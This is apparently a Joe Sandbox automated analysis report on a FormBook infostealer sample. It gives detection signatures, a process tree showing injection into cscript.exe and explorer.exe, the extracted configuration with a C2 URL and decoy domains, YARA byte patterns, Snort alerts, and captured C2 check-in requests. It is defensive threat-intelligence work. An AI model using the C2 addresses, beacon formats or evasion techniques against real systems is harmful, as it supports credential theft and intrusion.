Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report WXs8v9QuE7.exe

Overview

General Information

Sample Name:WXs8v9QuE7.exe
Analysis ID:438542
MD5:1f45b0e2bd669bce49b2140373243a91
SHA1:6ea61f1b39548a8b9192c0606d6daeb2c071a190
SHA256:ef05dd27e2dc499d3c1f42f00525fea7204735acd45c7a03efb78a241a9f9660
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WXs8v9QuE7.exe (PID: 5432 cmdline: 'C:\Users\user\Desktop\WXs8v9QuE7.exe' MD5: 1F45B0E2BD669BCE49B2140373243A91)
    • WXs8v9QuE7.exe (PID: 5880 cmdline: 'C:\Users\user\Desktop\WXs8v9QuE7.exe' MD5: 1F45B0E2BD669BCE49B2140373243A91)
      • cscript.exe (PID: 1632 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
        • cmd.exe (PID: 1864 cmdline: /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • autoconv.exe (PID: 5428 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.WXs8v9QuE7.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.WXs8v9QuE7.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.WXs8v9QuE7.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        1.1.WXs8v9QuE7.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.WXs8v9QuE7.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0WAvira URL Cloud: Label: phishing
          Found malware configurationShow sources
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: WXs8v9QuE7.exeVirustotal: Detection: 18%Perma Link
          Source: WXs8v9QuE7.exeReversingLabs: Detection: 19%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: WXs8v9QuE7.exeJoe Sandbox ML: detected
          Source: 18.2.cscript.exe.748a10.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 18.2.cscript.exe.4d87960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: WXs8v9QuE7.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cscript.pdbUGP source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: WXs8v9QuE7.exe, 00000000.00000003.228184886.0000000009990000.00000004.00000001.sdmp, WXs8v9QuE7.exe, 00000001.00000002.302101367.0000000000B8F000.00000040.00000001.sdmp, cscript.exe, 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WXs8v9QuE7.exe, cscript.exe
          Source: Binary string: cscript.pdb source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 4x nop then pop esi1_2_00415851
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 4x nop then pop ebx1_2_00406A98
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 4x nop then pop esi1_1_00415851
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 4x nop then pop ebx1_1_00406A98
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi18_2_00575851
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx18_2_00566A99

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 75.2.124.199:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 75.2.124.199:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 75.2.124.199:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49750 -> 23.225.101.32:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49750 -> 23.225.101.32:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49750 -> 23.225.101.32:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 94.136.40.51:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 94.136.40.51:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 94.136.40.51:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 45.192.104.89:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 45.192.104.89:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 45.192.104.89:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.oceancollaborative.com/bp3i/
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W HTTP/1.1Host: www.purpleqube.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W HTTP/1.1Host: www.tori2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W HTTP/1.1Host: www.underce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W HTTP/1.1Host: www.fredrika-stahl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W HTTP/1.1Host: www.mutanterestaurante.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zwAt45JEztQSRxPdch59MI6sbMm9ozxv/QrdgZuHtz8DMTYJ2HUJlOY3K2JoQYzD174Y&ApZx=O2MHiVr0W HTTP/1.1Host: www.9wsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W HTTP/1.1Host: www.5xlsteve.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd38qIM/2l+B&ApZx=O2MHiVr0W HTTP/1.1Host: www.oceancollaborative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W HTTP/1.1Host: www.motivactivewear.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W HTTP/1.1Host: www.purpleqube.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W HTTP/1.1Host: www.tori2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W HTTP/1.1Host: www.underce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W HTTP/1.1Host: www.fredrika-stahl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W HTTP/1.1Host: www.mutanterestaurante.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zwAt45JEztQSRxPdch59MI6sbMm9ozxv/QrdgZuHtz8DMTYJ2HUJlOY3K2JoQYzD174Y&ApZx=O2MHiVr0W HTTP/1.1Host: www.9wsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W HTTP/1.1Host: www.5xlsteve.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd38qIM/2l+B&ApZx=O2MHiVr0W HTTP/1.1Host: www.oceancollaborative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W HTTP/1.1Host: www.motivactivewear.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.reufhroir.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Jun 2021 16:25:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 62 70 33 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /bp3i/ was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: WXs8v9QuE7.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: WXs8v9QuE7.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
